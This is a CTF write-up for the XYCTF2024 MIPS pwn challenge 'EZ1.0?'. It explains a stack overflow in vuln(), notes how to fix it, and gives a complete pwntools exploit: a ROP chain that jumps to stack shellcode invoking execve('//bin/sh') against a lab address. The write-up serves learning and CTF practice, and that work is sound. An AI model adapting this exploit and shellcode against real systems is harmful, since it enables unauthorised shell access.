mips pwn例题
- 这里以XYCTF2024 EZ1.0? 为例题
- 题目分析
/* Decompiled target function from the challenge binary.
 * read() is told it may write 256 bytes into a 64-byte stack buffer, so any input
 * longer than 64 bytes runs past v1 into the saved registers and the return address
 * stored above it (the writeup's payload reaches the saved $ra at v1+0x44).
 * The defensive fix is to bound the read by the buffer: read(0, v1, sizeof(v1)),
 * or sizeof(v1) - 1 if the data is later treated as a NUL-terminated string. */
int vuln()
{
char v1[64]; // [sp+18h] [+18h] BYREF
read(0, v1, 256); /* 256 > sizeof(v1): the length is never checked against the buffer */
return 0;
}
无法泄露栈地址,因此要找适当的gadget来把sp的值给某个寄存器,然后跳转到栈上相应位置执行shellcode
- 剩下的找gadget找完直接rop+shellcode就打完了
- exp
from pwn import *
# NOTE(review): `from pwn import *` already exports p32, so this explicit import appears redundant.
from pwnlib.util.packing import p32
# Target is little-endian MIPS; 'debug' makes pwntools print every byte sent and received.
context(arch='mips',endian='little',log_level='debug')
# Local alternatives kept for reference: run the binary under user-mode qemu, or under gdb with
# a breakpoint at 0x400860.
# p = process(["qemu-mipsel","-L","/usr/mipsel-linux-gnu/","./mips"])
# p=gdb.debug("./mips",'b *0x400860')
# `p` is the pwntools tube used by dbg() and the payload code below (lab address from the writeup).
p=remote('10.131.223.200',57935)
def dbg() -> None:
    """Attach gdb to the live tube `p` with a breakpoint at 0x400860; call before sending the payload."""
    gdb.attach(p,'b *0x400860')
# dbg()
# Gadget notes from the writeup (kept verbatim; the addresses are specific to this binary).
# The author's remark inside the string, translated: "Odd — not sure why, but addiu $sp, 0x30
# also got executed." That is expected on MIPS: the instruction following jr $ra sits in the
# branch-delay slot and is executed before the jump takes effect, so the epilogue's sp
# adjustment always happens.
'''
0x00427968 | addiu $a2,$sp,0x68+var_10 | jalr $fp
.text:00400740 lw $ra, 0x1C+var_s10($sp) 0x2c
.text:00400744 lw $s3, 0x1C+var_sC($sp)
.text:00400748 lw $s2, 0x1C+var_s8($sp)
.text:0040074C lw $s1, 0x1C+var_s4($sp) 0x20
.text:00400750 lw $s0, 0x1C+var_s0($sp)
.text:00400754 jr $ra
.text:00400758 addiu $sp, 0x30
这里很怪不知道为什么发现addiu $sp, 0x30也执行了
0x0040B2A0 | addiu $a2,$sp,0x44+var_C 0x38 | jalr $s1
0x0041FBF4 | move $t9,$a2 | jr $a2
'''
# Shellcode (o32 MIPS, assembled by pwntools' asm() below). As written it stores the string
# "//bin/sh" (0x69622f2f, 0x68732f6e as little-endian words) just below $sp, NUL-terminates it,
# passes its address in $a0 with $a1 = $a2 = 0, and invokes syscall number 4011 (o32 execve).
# The `slti $reg, $zero, -1` forms set a register to 0; presumably chosen over `move` to keep
# NUL bytes out of the encoding — TODO confirm against the assembled bytes.
shellcode='''
slti $a2, $zero, -1
li $t7, 0x69622f2f
sw $t7, -12($sp)
li $t6, 0x68732f6e
sw $t6, -8($sp)
sw $zero, -4($sp)
la $a0, -12($sp)
slti $a1, $zero, -1
li $v0, 4011
syscall 0x40404
'''
# read() starts filling at sp+0x18, i.e. at v1; every offset below is relative to v1.
# Offset 0x44 is vuln's saved $ra: the first return goes to the 0x00400740 epilogue, which
# reloads $s0-$s3 and $ra from the stack (see the listing above) and returns again.
payload=b'a'*0x44+p32(0x00400740) #$ra, the first return address
# The epilogue's `lw $s1, 0x20($sp)` reads offset 0x68 -> the move $t9,$a2 / jr $a2 gadget.
payload=payload.ljust(0x68,b'a')+p32(0x0041FBF4) #s1
# Its `lw $ra, 0x2c($sp)` reads 12 bytes later (offset 0x74) -> 0x0040B2A0, which computes
# $sp+0x38 into $a2 and then jalr $s1 jumps via the $s1 gadget to that stack address.
payload+=b'a'*0x8+p32(0x0040B2A0) #$ra, the second return address
# Offset 0xb0 is where that computed $a2 points, so the shellcode is placed there; the final
# ljust pads the buffer to the full 256 bytes that read() consumes.
payload=payload.ljust(0xb0,b'a')+asm(shellcode)
payload=payload.ljust(0x100,b'a')
p.send(payload)
p.interactive()